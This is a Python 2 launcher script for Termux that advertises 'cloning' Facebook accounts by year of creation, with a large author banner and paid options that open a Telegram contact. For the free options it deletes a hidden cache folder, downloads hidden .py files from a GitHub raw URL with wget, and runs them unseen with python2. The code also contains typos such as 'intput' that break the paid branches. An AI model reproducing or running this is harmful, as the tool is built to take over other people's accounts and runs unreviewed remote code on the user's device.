#coding=utf-8
#THIS IS A TESTING TOOL THE MAIN GAME IS COMING

import os
import sys,datetime
try:
  os.system('clear')
  os.system('pkg install wget python2 && pip2 install mechanize bs4 requests lolcat && termux-setup-storage')
  os.system('clear')
  os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
  os.system('date | lolcat')
  print(' ')
  print(32* '\033[1;93m▀\033[1;91m▀')
  print('\n\n\033[1;92m  ( 1 )\033[1;93m START CLONING ACCOUNTS\033[1;92m [ 2005 ] ( PAID ) ')
  print('\n\033[1;92m  ( 2 )\033[1;93m START CLONING ACCOUNTS \033[1;96m[ 2006 - 2007 ] ( PAID )  ')
  print('\n\033[1;92m  ( 3 )\033[1;93m START CLONING ACCOUNTS \033[1;94m[ 2008 ] ( PAID ) ')
  print('\n\033[1;92m  ( 4 )\033[1;93m START CLONING ACCOUNTS \033[1;90m [ 2008 - 2009 ] ( PAID ) ')
  print('\n \033[1;92m ( 5 ) START CLONING ACCOUNTS \033[1;95m [ 2009 ] \033[1;96m( FREE ) \033[1;91m { UID : 1000000 }')
  print('\n\033[1;92m  ( 6 )\033[1;94m START CLONING ACCOUNTS \033[1;96m [ 2009 ] ( FREE ) [ UID : 10000000 ]')
  print('\n \033[1;92m ( 7 ) START CLONING ACCOUNTS \033[1;95m [ 2009 - 2010 ] \033[1;91m( FREE ) \033[1;92m {NEW METHOD}')
  print('\n\033[1;92m  ( 8 )\033[1;93m START CLONING ACCOUNTS \033[1;97m [ 2010 - 2016 ] ( FREE ) ')
  print('\n \x1b[1;93m [ 9 ]\x1b[1;96m  \x1b[1;93mCONTACT ME ON FACEBOOK    ')
  print('\n \x1b[1;94m [ 10 ]\x1b[1;94m  \x1b[1;91mMY OTHER COMMANDS    \n')
  print(' \x1b[1;96m [ 11 ]\x1b[1;96m  \x1b[1;96mFOLLOW ME ON GITHUB \n  ')
  print(' \033[1;96m [\x1b[1;93m0\x1b[1;96m]\x1b[1;92m EXIT\n\n')
  print(32* '\033[1;93m▀\033[1;91m▀')
  hselect = input('\n \033[0;97m[ \033[0;93m✘\033[0;97m ]\033[0;92m CHOOSE ANY OPTION ════╣⫸\033[0;97m ')
#bal sal error chudani
  if hselect in ['1','01','2005']:
    os.system('clear')
    os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
    print('\x1b[1;96mTHIS IS A PAID TOOL \n CONTACT THE ADMIN FOR USING TOOL \n Bye')
    intput('\n\n\nENTER TO CONTINUE')
    os.system('xdg-open https://t.me/alamin123khan')
  elif hselect in ['2','02','2006']:
    os.system('clear')
    os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
    print('\x1b[1;96mTHIS IS A PAID TOOL \n CONTACT THE ADMIN FOR USING TOOL \n Bye')
    intput('\n\n\nENTER TO CONTINUE')
    os.system('xdg-open https://t.me/alamin123khan')
  elif hselect in ['3','03','2008']:
    os.system('clear')
    os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
    print('\x1b[1;96mTHIS IS A PAID TOOL \n CONTACT THE ADMIN FOR USING TOOL \n Bye')
    int(intput('\n\n\nENTER TO CONTINUE'))
    os.system('xdg-open https://t.me/alamin123khan')
  elif hselect in ['4','04','2009']:
    print('2009 -2010 er id')
  elif hselect in ['5','05','005']:
    os.system('rm -rf /data/data/com.termux/files/usr/opt/.cache && mkdir /data/data/com.termux/files/usr/opt/.cache')
    os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
    os.system('cd /data/data/com.termux/files/usr/opt/.cache && wget https://raw.githubusercontent.com/Ruler-Boy/UPDATE/main/.pycache9.py')
    os.system('clear && cd /data/data/com.termux/files/usr/opt/.cache && python2 .pycache9.py')
  elif hselect in ['6','06','006']:
    os.system('rm -rf /data/data/com.termux/files/usr/opt/.cache && mkdir /data/data/com.termux/files/usr/opt/.cache')
    os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
    os.system('cd /data/data/com.termux/files/usr/opt/.cache && wget https://raw.githubusercontent.com/Ruler-Boy/UPDATE/main/.pycache98.py')
    os.system('clear && cd /data/data/com.termux/files/usr/opt/.cache && python2 .pycache98.py')
  elif hselect in ['7','07','007']:
    os.system('rm -rf /data/data/com.termux/files/usr/opt/.cache && mkdir /data/data/com.termux/files/usr/opt/.cache')
    os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
    os.system('cd /data/data/com.termux/files/usr/opt/.cache && wget https://raw.githubusercontent.com/Ruler-Boy/UPDATE/main/.py96.py')
    os.system('clear && cd /data/data/com.termux/files/usr/opt/.cache && python2 .py96.py')
  elif hselect in ['8','08','2011']:
    os.system('rm -rf /data/data/com.termux/files/usr/opt/.cache && mkdir /data/data/com.termux/files/usr/opt/.cache')
    os.system('echo -e "\n\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n   ██╗███╗░░░███╗██████╗░███████╗██████╗░██╗░█████╗░██╗░░░░░\n   ██║████╗░████║██╔══██╗██╔════╝██╔══██╗██║██╔══██╗██║░░░░░\n   ██║██╔████╔██║██████╔╝█████╗░░██████╔╝██║███████║██║░░░░░\n   ██║██║╚██╔╝██║██╔═══╝░██╔══╝░░██╔══██╗██║██╔══██║██║░░░░░\n   ██║██║░╚═╝░██║██║░░░░░███████╗██║░░██║██║██║░░██║███████╗\n   ╚═╝╚═╝░░░░░╚═╝╚═╝░░░░░╚══════╝╚═╝░░╚═╝╚═╝╚═╝░░╚═╝╚══════╝\n\n    ░█████╗░██████╗░░█████╗░░█████╗░██╗░░██╗███████╗██████╗░\n    ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝██╔════╝██╔══██╗\n    ██║░░╚═╝██████╔╝███████║██║░░╚═╝█████═╝░█████╗░░██████╔╝\n    ██║░░██╗██╔══██╗██╔══██║██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗\n    ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██║░╚██╗███████╗██║░░██║\n    ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝\n\n0000000000000000000000000000000000000000000000000000000000000000\n\n\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n   \033[1;92m00       AUTHOR  : HUNTERBOY ALAMIN                      00\n   \033[1;95m00                                                       00\n   \033[1;94m00       FACEBOOK : MD ALAMIN KHAN                       00\n   \033[1;97m00                                                       00\n   \033[1;91m00   CONTACT  : https://www.facebook.com/alaminkhan.60   00\n   \033[1;90m00000000000000000000000000000000000000000000000000000000000\n\n\n" | lolcat')
    os.system('cd /data/data/com.termux/files/usr/opt/.cache && wget https://raw.githubusercontent.com/Ruler-Boy/UPDATE/main/.pycache10.py')
    os.system('clear && cd /data/data/com.termux/files/usr/opt/.cache && python2 .pycache10.py')
  elif hselect in ['9','09','C']:
    os.system('clear && xdg-open https://www.facebook.com/alaminkhan.60')
    os.system('python Imperial.py')
  elif hselect in ['10','10','010']:
    os.system('clear && xdg-open https://www.facebook.com/hunterboy.alamin')
    os.system('python Imperial.py')
  elif hselect in ['110','11','011']:
    os.system('clear && xdg-open https://github.com/Hunter-alamin')
    os.system('python Imperial.py')
  elif hselect in ['0','00','000']:
    print('Bye')
  else:
    print('choose right option')
except:
  print('error')

